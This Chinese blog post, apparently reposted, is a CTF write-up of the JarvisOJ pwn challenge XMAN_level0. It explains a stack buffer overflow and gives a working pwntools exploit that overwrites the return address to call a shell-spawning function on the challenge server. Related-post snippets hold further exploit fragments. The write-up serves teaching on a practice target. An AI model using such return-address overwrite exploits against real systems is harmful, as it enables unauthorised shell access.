JarvisOJ pwn (一)

最新推荐文章于 2023-10-01 17:18:57 发布
最新推荐文章于 2023-10-01 17:18:57 发布
阅读量121 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/-twinkle-star/p/10701504.html
版权

0x    01    XMAN_level0
常规的跟进函数,查看漏洞函数

可以看到函数里定义了一个字符变量他在栈中存放的位置是rsp-80h,而下面的read语句却允许我们输入最多512字节的数据,buf的首地址到rbp也就是栈帧的底部都才只有128个字,所以我们完全可以通过read函数来覆盖此函数的返回地址。

然后就是查找程序中有没有可以用来攻击的程序或者语句

这里可以看到有system()和/bin/sh,再从IDA pro右边看到有个callsystem函数,我们可以将漏洞函数中的返回地址覆盖成这个callsystem函数的地址,这样漏洞函数执行完就会跳转到着执行callsystem函数,并弹出一个高权限的shell,达到控制服务器的目的。

示意图:

payload:

from pwn import *

# 连接服务器
io=remote("pwn2.jarvisoj.com",9881)

# call_system函数的地址
call_system_addr=0x0000000000400596

# 填充原理见示意图
payload='A'*136+p64(call_system_addr)

# 发送payload
io.sendline(payload)

# 切换到交互模式
io.interactive()
Payload

 

转载于:https://www.cnblogs.com/-twinkle-star/p/10701504.html

dezang2878
关注
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1321
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
Jarvis OJ pwn刷题
清霂的博客
03-26 265
目录level1level3level3_x64smashes level1 #!/usr/bin/env python3 from pwn import * context(os="linux", arch="i386", log_level="debug") content = 1 def main(): if content == 0: io = process("./level1.80eacdcd51aca92af7749d96efad7fb5") else:
jarvis oj pwn
qq_44813849的博客
07-24 239
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
jarvis OJ
CHOOOU的博客
11-05 944
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1219
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
jarvisoj pwn level5 wp
zszcr的博客
03-26 1992
题目要求练习 mmap和mprotect 函数 不能调用system或者是execv函数来获取shell同时给了可执行文件和libc文件先查了下mmap和mprotect函数是干什么的两个函数原型如下:void* mmap(void* addr, size_t len, int port, int flag, int filedes, off_t off)#mmap(rdi=shellcode_a...
Jarvis OJ-PWN
weixin_45461609的博客
08-08 271
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 561
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 915
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJpwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
Jarvis OJ
kof2019的博客
08-05 467
Jarvis OJ - 软件密码破解-1 -Writeup 转载请标明出处http://www.cnblogs.com/WangAoBo/p/7243801.html 记录这道题主要是想记录一下动态调试的过程 题目: 分析: 刚开始拿到这道题目还是想用IDA静态分析,但无奈函数太多找不到关键函数,看别人Writeup也只是说关键函数为sub_401BB0但不知道怎么找
171130 逆向-JarvisOJ(Fibonacci)
whklhhhh的博客
11-30 1135
1625-5 王子昂 总结《2017年11月30日》 【连续第426天总结】 A. JarvisOJ-Re-Fibonacci B. 首先运行,提示 来让我们玩一个数列游戏: a[0]=0,a[1]=1 a[2]=1,a[3]=2 a[4]=3,a[5]=5 ………….. 请计算a[100000000000000]: 刚开始还以为是通过什么算法做出来,准备
jarvisoj——admin
D-R0s1的博客
10-08 799
  在接触jarvisoj平台的题目的时候,,第一个感觉就是考察的技能点比较多,比较全面,较其他平台相比题目比较难。但是当我们在努力弄懂一个题目考察的技能点及其解题思路的时候,收获也是很大的。再解决一些web题的过程中,除了要代码审计的时候要细心以外,在抓包分析的过程中也要十分的细心。虽然说比赛过程中,时间是很宝贵的,要提高做题速度,但是还是要步骤操作快,分析的时候要慢,,不然很可能漏掉一些细节线...
Jarvisoj刷题笔记(CTF Basic题)
最新发布
Arthur_WangYu的博客
10-01 706
某天A君的网站被日,管理员密码被改,死活登不上,去数据库一看,啥,这密码md5不是和原来一样吗?为啥登不上咧?d78b6f302l25cdc811adfe8d4e7c9fd34 请提交PCTF{原来的管理员密码}
jarvisoj pwn level6 writeup
charlie_heng的专栏
01-21 1758
考完试了,又开始做题 这题是一道很好的用来熟悉堆的题 首先先确定漏洞的地方是delete note 漏洞有两个 1. 没有校验对应的堆是否有free 2. delete完之后没有把指向堆的指针清除 所以可以利用double free,触发unlink,达到任意内存修改的目的 具体怎么利用在https://www.cnblogs.com/0xJDchen/p/6195919.html
Jarvis OJ—Web
m0re's blog
09-19 688
Web PORT51 使用51端口,但是修改端口的话,32770就不是这道题的了,所以应该是使用本地的端口51来访问。所以就需要用到curl命令。curl命令可以进行学习一下,回头有空学习一下。 LOCALHOST 本地访问,简单题,设置一下hosts文件就行,将题目网址加上去就OK。也可以使用插件刷新一下得到flag Login 登录,但是尝试了几个弱口令,还进行了爆破,不过没有得到flag,所以抓包抓包看看返回结果这里有个hint, "select * from `admin` where p.
jarvisoj_level0
weixin_56301399的博客
07-21 625
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
jarvisoj_typo
z1r0的博客
03-17 443
jarvisoj_typo 查看保护 arm程序,这一类的环境的话可以去网上找找怎么安装,qemu,gdb-multiarch,等 等 32位,静态链接,去了符号表信息攻击思路:因为去了符号表信息,进了ida之后基本看不出程序功能 这里笔者直接手动fuzz了一下发现有栈溢出漏洞 保护没有开canary和pie,所以考虑rop了。 劫持程序控制流执行system("/bin/sh");找一下/bin/sh 看了一下引用,跟进10bab 这个函数和do_system()很相似,暂且先认为它是syste
Jarvis OJ admin
沐目的博客
04-18 554
Jarvis OJ admin (http://web.jarvisoj.com:32792/)题目链接 首先打开连接后,发现什么也没有,然后抓包,发现有个admin=0,然后将admin改成等于1,但发现什么也没有发生。让后想到题目是admin,于是去式了一下index。php发现不行。 ...
jarvisoj_level2_x64
、moddemod
06-17 545
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值